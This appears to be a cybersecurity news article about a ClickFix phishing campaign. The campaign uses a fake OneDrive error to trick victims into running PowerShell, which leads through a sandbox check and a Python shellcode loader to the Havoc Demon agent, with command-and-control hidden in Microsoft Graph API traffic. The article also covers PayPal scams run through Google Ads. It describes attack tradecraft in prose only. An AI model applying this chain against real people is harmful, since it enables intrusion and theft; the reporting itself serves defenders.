A new phishing campaign utilizing the ClickFix technique to deploy the Havoc command-and-control framework has been identified by cybersecurity researchers. This campaign kicks off with a phishing email containing an HTML attachment labeled “Documents.html.” Upon opening the file, an error message related to Microsoft OneDrive pops up, prompting the user to update the DNS cache manually. This deceptive message is intended to mislead the victim into running a PowerShell command that initiates the infection process.
The PowerShell command in this phishing attack triggers the download of a malicious script from a SharePoint server controlled by the adversary. This script first checks if it is operating in a sandbox environment before proceeding. If the system appears clean, the script proceeds to download the Python interpreter (“pythonw.exe”) if it is not already present, and executes a Python script serving as a shellcode loader for a more sophisticated phase of the attack. This phase involves launching a reflective loader, KaynLdr, capable of running an embedded DLL—the Havoc Demon agent.
The Havoc framework employed by the attackers is disseminated through SharePoint sites, with its command-and-control functions disguised using the Microsoft Graph API. This tactic makes it challenging for security tools to detect malicious activities since the C2 communications are hidden within legitimate and trusted services. Havoc encompasses a wide array of capabilities enabling attackers to collect system information, run commands, manipulate files, and execute advanced attacks like token manipulation and Kerberos attacks. This renders the framework highly perilous and efficient for maintaining long-term persistence on compromised systems.
The revelation of this phishing campaign coincides with continuous reports of cybercriminals leveraging Google Ads policies to target PayPal customers. Scammers have utilized fraudulent ads to deceive victims into calling fake customer service numbers, where they are coerced to divulge sensitive personal and financial data. Experts caution that such scams are growing in prevalence, particularly as cybercriminals exploit vulnerabilities in popular platforms such as Google Ads. This underscores the necessity of remaining vigilant and implementing multiple layers of security to defend against sophisticated cyber threats.